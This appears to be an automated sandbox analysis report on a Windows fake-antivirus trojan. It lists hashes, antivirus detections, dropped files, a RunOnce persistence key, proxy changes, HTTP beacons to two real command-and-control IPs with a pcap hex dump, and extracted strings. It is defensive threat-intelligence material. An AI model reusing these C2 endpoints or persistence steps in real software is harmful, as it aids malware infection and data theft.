Analysis Date2015-10-04 21:15:49
MD5084f2c0a467dae0d0fee2fa5de258039
SHA1a4837e80a359fdbb1a284913a82630e492fbf84b

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 5a4513b970740ffb805e808cf6b18310 sha1: 060a4eb5d118d66e2354c9e276322af3abef48b8 size: 189440
Section.rdata md5: 6840e6f20fc63e18ad1326a580df691a sha1: 6661ca95db0769ab90a8b2d46fccb8c303144af0 size: 2048
Section.data md5: 4d7afaf048334883e2cf7e1b49b1f21d sha1: b1c2639089a018a77569505f4b5a10725ee433de size: 123392
Section.rsrc md5: 876c3a6771eaa28691411359aae678b4 sha1: 8c48c956811369f398a114b8472352226087af8a size: 5120
Timestamp1970-01-07 07:02:22
PEhashc4e0faadecb9320d765cd0c878406c4e14c97487
IMPhashb3fb08000bf2c73a4d021514861a66a8
AVCA (E-Trust Ino)Win32/Diple.A!generic
AVF-SecureGen:Heur.Cridex.2
AVDr. WebTrojan.Fakealert.20556
AVClamAVno_virus
AVArcabit (arcavir)Gen:Heur.Cridex.2
AVBullGuardGen:Heur.Cridex.2
AVPadvishError Scanning File
AVVirusBlokAda (vba32)SScope.Malware-Cryptor.Maxplus.0997
AVCAT (quickheal)FraudTool.Security
AVTrend MicroTROJ_FAKEAV.SMID
AVKasperskyHoax.Win32.FlashApp.a
AVZillya!Trojan.FakeAV.Win32.113953
AVEmsisoftGen:Heur.Cridex.2
AVIkarusTrojan.Win32.Pakes
AVFrisk (f-prot)W32/FakeAlert.LY.gen!Eldorado
AVAuthentiumW32/FakeAlert.LY.gen!Eldorado
AVMalwareBytesTrojan.Agent
AVMicroWorld (escan)Gen:Heur.Cridex.2
AVMicrosoft Security EssentialsRogue:Win32/Winwebsec
AVK7Trojan ( 001e60c61 )
AVBitDefenderGen:Heur.Cridex.2
AVFortinetW32/FakeAlert.AMB!tr
AVSymantecTrojan.FakeAV!gen39
AVGrisoft (avg)FakeAlert.AAS
AVEset (nod32)Win32/Kryptik.MBU
AVAlwil (avast)MalOb-FY [Cryp]
AVAd-AwareGen:Heur.Cridex.2
AVTwisterTrojan.F8292F1979200828
AVAvira (antivir)TR/FakeAV.btxt.7
AVMcafeeGeneric FakeAlert.amb
AVRisingTrojan.FakeAV!49B1

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\All Users\Application Data\hLhPfFnEjAm05200\hLhPfFnEjAm05200.exe
Creates FileC:\a4837e80a359fdbb1a284913a82630e492fbf84b
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\a2BFC.tmp
Deletes FileC:\a4837e80a359fdbb1a284913a82630e492fbf84b
Creates Process"C:\Documents and Settings\Administrator\Local Settings\Temp\aD646.tmp"
Creates Process"C:\Documents and Settings\All Users\Application Data\hLhPfFnEjAm05200\hLhPfFnEjAm05200.exe" "C:\malware.exe"
Creates MutexDon't stop me! I need some money!

Process
↳ "C:\Documents and Settings\All Users\Application Data\hLhPfFnEjAm05200\hLhPfFnEjAm05200.exe" "C:\malware.exe"

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\hLhPfFnEjAm05200 ➝
C:\Documents and Settings\All Users\Application Data\hLhPfFnEjAm05200\hLhPfFnEjAm05200.exe\\x00
Creates FileC:\Documents and Settings\All Users\Application Data\hLhPfFnEjAm05200\hLhPfFnEjAm05200
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates MutexDon't stop me! I give work and money for you!
Winsock DNS69.50.195.77

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\aD646.tmp"

Network Details:

HTTP GEThttp://194.28.113.214/lurl.php?affid=05200
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322)
HTTP POSThttp://69.50.195.77/i.php?affid=05200&v=2
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322)
Flows TCP192.168.1.1:1031 ➝ 194.28.113.214:80
Flows TCP192.168.1.1:1031 ➝ 194.28.113.214:80
Flows TCP192.168.1.1:1032 ➝ 69.50.195.77:80

Raw Pcap
0x00000000 (00000)   47455420 2f6c7572 6c2e7068 703f6166   GET /lurl.php?af
0x00000010 (00016)   6669643d 30353230 30204854 54502f31   fid=05200 HTTP/1
0x00000020 (00032)   2e310d0a 52656665 7265723a 20687474   .1..Referer: htt
0x00000030 (00048)   703a2f2f 3139342e 32382e31 31332e32   p://194.28.113.2
0x00000040 (00064)   31340d0a 41636365 70743a20 2a2f2f2a   14..Accept: *//*
0x00000050 (00080)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000060 (00096)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000070 (00112)   7469626c 653b204d 53494520 372e303b   tible; MSIE 7.0;
0x00000080 (00128)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000090 (00144)   20475442 302e303b 202e4e45 5420434c    GTB0.0; .NET CL
0x000000a0 (00160)   5220312e 312e3433 3232290d 0a486f73   R 1.1.4322)..Hos
0x000000b0 (00176)   743a2031 39342e32 382e3131 332e3231   t: 194.28.113.21
0x000000c0 (00192)   340d0a43 6f6e6e65 6374696f 6e3a204b   4..Connection: K
0x000000d0 (00208)   6565702d 416c6976 650d0a43 61636865   eep-Alive..Cache
0x000000e0 (00224)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000f0 (00240)   68650d0a 0d0a                         he....

0x00000000 (00000)   504f5354 202f692e 7068703f 61666669   POST /i.php?affi
0x00000010 (00016)   643d3035 32303026 763d3220 48545450   d=05200&v=2 HTTP
0x00000020 (00032)   2f312e31 0d0a5265 66657265 723a2068   /1.1..Referer: h
0x00000030 (00048)   7474703a 2f2f3639 2e35302e 3139352e   ttp://69.50.195.
0x00000040 (00064)   37370d0a 41636365 70743a20 2a2f2f2a   77..Accept: *//*
0x00000050 (00080)   0d0a436f 6e74656e 742d5479 70653a20   ..Content-Type: 
0x00000060 (00096)   6170706c 69636174 696f6e2f 782d7777   application/x-ww
0x00000070 (00112)   772d666f 726d2d75 726c656e 636f6465   w-form-urlencode
0x00000080 (00128)   640d0a55 7365722d 4167656e 743a204d   d..User-Agent: M
0x00000090 (00144)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x000000a0 (00160)   61746962 6c653b20 4d534945 20372e30   atible; MSIE 7.0
0x000000b0 (00176)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x000000c0 (00192)   3b204754 42302e30 3b202e4e 45542043   ; GTB0.0; .NET C
0x000000d0 (00208)   4c522031 2e312e34 33323229 0d0a486f   LR 1.1.4322)..Ho
0x000000e0 (00224)   73743a20 36392e35 302e3139 352e3737   st: 69.50.195.77
0x000000f0 (00240)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000100 (00256)   3a203738 0d0a436f 6e6e6563 74696f6e   : 78..Connection
0x00000110 (00272)   3a204b65 65702d41 6c697665 0d0a4361   : Keep-Alive..Ca
0x00000120 (00288)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x00000130 (00304)   63616368 650d0a0d 0a646174 613d3331   cache....data=31
0x00000140 (00320)   41454138 34334232 44323039 45463245   AEA843B2D209EF2E
0x00000150 (00336)   32354536 36394441 42303638 33373534   25E669DAB0683754
0x00000160 (00352)   33333939 37443733 38434630 43433644   33997D738CF0CC6D
0x00000170 (00368)   32323246 31324439 38413537 45373031   222F12D98A57E701
0x00000180 (00384)   30343126 763d32                       041&v=2


Strings
:
.
...
-0.
2
.
.
}
.
.
.v
[.
."
.P.
~
.
.
.
..X
.$.
.
1001
File
Main
MS Sans Serif
06y|'$zI
[-0_&8
-<0BwI@
0}`j=e
-0(LdcA
0-n2@&
^ 0ptt
0+[{q?q
1C]0*"
1L6~XWiv~;
1P&<4q
1	roIE
1WW8vV_[
.1zR.=
2}mztp2
2.[:N8{|?
2vg}B24N
3+,2+P
3+4	YK
3K)N.Q
|3Ko)G2i
3m@Tm].
^3z*G/
[4^bh~
	?4P	r,
4Z7!7PT
57O+{$
5FA1Dm=
&*5@is
@5jR;od
5\SYc3
)5XG,uX
-5XW-eYW-EY
,5XW-EZ
)5XW-EZ
5Z(cpC
64Dqjpr
6Bn(Z\
6fj$Pe
6J7?|<
6Q[3Dnf
6SLeJ	5f
6 T$"wt.
79[vp'
!7}BY+
7E#V:<
7m.8NhE,
7ninVi?
'7/o8=
+7T	\V
,>7>@U7
!8^8q"L
;/8:9S
8Aa[F{
8Lv6y>
8},WP64%
95M-a_
99\JUI
9\+DHL!
!9[!_g
9iVwF.zpf
	9l5AY,
a+(4huEBF
A.}8	H[
A@8mDh
Agzz[q
 Ahep:
Ai;WC`
A\lhq4q
a?LtOnU
AM"/xn
a{p+dva
</assembly>
<assemblyIdentity
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
Au6=4;
-a:)U>?|F
Au	@l:
+|B2~-
B5/p-P
B^9\:}
B)9dN<*d
BBe{H=
.{bd>;iep9
bEqaaq
>b-,gu
bidih3
BitBlt
#b$$J/M
&b`]K0
[\_|BOh
B<OI<k
B>oRkRm
BS^\53
B%TL7bH
*b&T|Ra]W
B/wMT2
C10gx|
c((2_m
CBDbka
`c&#e:n4
CG`yDmC
CharLowerA
CloseHandle
cm#\\:
CmhJtU
Cp.<^j"
CreateThread
c~=TCs
cvA,**
C<y|W}r
c+zS\h
|( ?;d
d )0u`
D1mw[v
+d3/MO
DA8 L5
|dab'i
D~AQ;g
@.data
DeleteCriticalSection
~DE,_P
</dependency>
<dependency>
</dependentAssembly>
<dependentAssembly>
Dgn?Lda
/+D~H[
d$jN$bk#"
~^DK@>
DndkXk[
,dO82T
DoB*bX
)d&P|dbV
:d{TRV
=DT;SMT
d+wT#'
dz`?eZn
dZlhoI3
;E|2C=$
e{2}rc
e|53v*
e%aiXt
eAsgT+
|EdBp'7*
	eE!o[>zt
=]Eij	v
e$j18=w4
+EL;aZA
,+E&{m
EnumSystemLocalesA
enz.dLR
_EqTxP
ExitProcess
ExitThread
$f0/h$L
FBocTvV
_Fbq^[
f|bTFj
FbYb|Wb
f{d.>-etV
FDvx8K
_F%[e5QH
F<~fk/
~F(K;Xck
FlushFileBuffers
FlushInstructionCache
FreeEnvironmentStringsA
|~f*)x
fXQWQ)
fyk-47
fZXoZvyh
G2cSF<X
gA_%V)
gBlChB
	}GC9&
GDI32.dll
GetBkColor
GetBkMode
GetCommandLineA
GetConsoleCP
GetConsoleMode
GetConsoleOutputCP
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetEnvironmentStrings
GetFileType
GetFontData
GetKeyState
GetLastError
GetOEMCP
GetPixel
GetProcessHeap
GetProcessShutdownParameters
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetTimeZoneInformation
gF(He;_
gFtNfB 
glqt@j&y
G@n`T4
}=gO)|
g+_PC@.}
:g:q-:
"g;;V_0
gx8Yz.
`g.#Zf[f
h02x9?
h3a~|i
.}Hb{l
h_C[g~
HcIc|"
HeapAlloc
HeapCreate
HeapFree
h?eIi-a2\eq
hFx)g{
_H/>]g
HIQldM
`hNuDX%
H-:_V"
h)V^e[}
h.-vfBf
,hxs-(
h"*y{$26T
"I08zq*
i5;PUO
i6,0eBz
I*(c,H
Idk.0?
`I,?fN^B
:I'i+|+J
InterlockedDecrement
InterlockedExchange
[IO@4v
}%ip~qWC
IsValidLocale
:iY~	*!
,~IY4	
J1LMR{1
&j2pk_
J3U HR
J~B6XCm
jE){Z[
jFiyHsmvI
J(+G9V
JLOmRDi
jp7$mq
:JT1;"
]#J	u?
JwJGwu
jwkj~'F
}Jz		n
K1a1y~
	K1IZ@&
k^360r
k&4no?I
\kB$JexrQ
KERNEL32.dll
kEVn9|(~P
kJ+ujt=
K	RRgF
KS5T.'
/Kt#c[n
kU,Kil3a
+K,uqi
kW7XD9g
*KW:[8i
K<:wo+
+k|wPH
+k_,;Z>
L1(c!)
<l2hNn{7
[l-	&3
language="*"
lBS+tX
LCMapStringA
ld8hmC
LeaveCriticalSection
lM`n1"
LocalAlloc
L+z^drg,
.=l+zHG
m50y`8
m\iFMO
Mj[oop
mLO2nO\
MSIMG32.dll
!m>:-T
m?VI5A
mWVM:_1
<n1sU	
name="Microsoft.Windows.Common-Controls"
N*@bO_
nbqIgU
nilE2[
$Nn3xZ
NnNOm;g<R$
nptmv+
n/TO(GrG
:N^UVw8
N}V,6wz
~nVpn:
n_z7vd
O26.;;
o3pxXx
o4+W~Vu
:*`O8a
>OA3Q~<
o;@AZZ@
[^Ob>S
OFLtd2
ogW$U%
o{@KKTI
|oMzg\W:
onJ/rqm
OOvpD'
oQYklc
o:rQ:6
|o)	S\
-os+Y.
oY&V_\P
//ozLT
p0=&BNO
p0eAP|X
pCg79cj,m
|~pEBj0
pe{/VuD
pH]BQ]
ph"ro/:z
.P?o*>
p>p:JU
:\pR)nHW
processorArchitecture="*"/>
|Pu5~z
publicKeyToken="6595b64144ccf1df"
>PYV?X
]pZ9Jz
Q6YP vg
Q[7gHb]
Q)Dvo#
qF!Fk%
qJD)QyJm
q;lH Y
Q/n1;&
%QOUTK6
Qqqre#
QrAEF)r
Q?%Ru_\
quz>y/
qyDFIp
R<\1tW
R5jpw	
r844%D
r~a`bu
\R C0B,h
`.rdata
]@r}ec
[;rERW
^RhxKZ
Rich$-
rk{V4Kx+
	rn[gvg
^Rr{f)+
Rt3YG]
RtlUnwind
'R'	To
~R_Ujy
(R_vRW
rZ-OEn
s18&>I
]S3jZrm#96
S70BGNm
sBg.}\d
SeJ*=e\	
SelectObject
SendMessageA
SetEndOfFile
SetEnvironmentVariableA
SetHandleCount
SetLastError
SetProcessShutdownParameters
SetStdHandle
SetTextCharacterExtra
|shC|c
=sSW*Z
ST][C_h
s.U]`$
s>v+L;
;sx7=/s
SxDXj_]zD	&
tA66Jj
T;A:x,
Tc++:,6
!This program cannot be run in DOS mode.
t=i]zI
TL+LPEn
tqTtIrvU
tr8w[m:~
TransparentBlt
T,rLN-
^tsiZR
^(Tu]'
T>V+@E
tW=AT13=
type="win32"
=(t@Zr
U|%6S_
`U*c/v
u%C-yBC
-UCzP;
+uHB?!
ujw[Q0{S]
u[mzjW
>Urhb+he
USER32.dll
u_V7M(JuNKU
uW0OC@
]Uw1/[
~Uwf:LZg
)u\<.wvB
uZ~GVQ
V7F-^b
vc4i7z
vcMU(Az
version="6.0.0.0"
vfzOUz
vh9p^T
Vi|D{)g0
VirtualAlloc
VirtualFree
VirtualQueryEx
Vmzw(J8
[vR4CIxu
v{TeK(
V<u[Kf
|vx3zyQ
VxOj/a?
wCVa@n
W-E*kJE
wJC6Ky
WMEfT'
WN=ap0!
wnm5Rm
 `W%p-qi?
w\r9p[
WriteConsoleA
WTuRe-
	W^U)b
wV99*i
 W-!+yi
"w>zC$
X{1:A$
X	2-Q:`F
X2t,~8
X8ba{@
(X8Hq-
x}aQ{%
/xC\::"
X%dZa<dWT
Xk	M/N
xl`f<zE
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
xNx[T6:
-xP*n+
XR8,$Z
(x!S vh
xt;SQW
Xvm<JS
XW-eY'
}X Ws/
( %-Y{!
Y6H`;`
Y7],Wh
YCANdm#m_
YG.fju'
Ylz`GJq
y)*oPP
y<%pTG4
yqRHE 
YrA<z.
>yS@`h
~'ysmww
y`>U8G
yUEf*2l!
#Y'USH
!yUv#	
Y#-w.a
)Z/]|%
/@_z0d
z2nl4&
Z7/5^W-
}Z7(wy
Z<@AheQ
zaR?X\
|z,asnzm
Z]B	t 
zCPJQg$
z\\I^'
z=-jQyD
Z\M|C\{
ZNox w1
!Zo?+{
:-zOZd
zPm?u;^n
ZpPdNS!d
zt8h0.,
zv4My_